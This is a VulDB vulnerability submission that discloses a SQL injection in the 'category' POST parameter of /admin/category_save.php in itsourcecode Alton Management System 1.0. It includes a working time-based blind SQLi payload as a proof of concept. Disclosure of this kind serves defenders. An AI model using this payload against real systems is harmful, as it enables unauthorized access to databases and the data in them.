Submit #381093: itsourcecode Alton Management System 1.0 SQLi category_save.phpinfo

Titleitsourcecode Alton Management System 1.0 SQLi category_save.php
DescriptionLog in as an administrator user, access the "/admin/category_save.php" page, and pass in the "category" parameter. Due to lax filtering, this parameter can lead to SQL injection vulnerabilities. ---------------POC--------------- Parameter: category (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: category=1' AND (SELECT 4315 FROM (SELECT(SLEEP(5)))UBMb) AND 'gUvK'='gUvK ------------------------------------
Source⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE8-3.md
User
 Dee.Mirage (UID 71702)
Submission07/27/2024 12:30 (2 years ago)
Moderation07/30/2024 15:29 (3 days later)
StatusAccepted
VulDB entry273144 [itsourcecode Alton Management System 1.0 /admin/category_save.php Category sql injection]
Points20

PreviousOverviewNext

Do you need the next level of professionalism?

Upgrade your account now!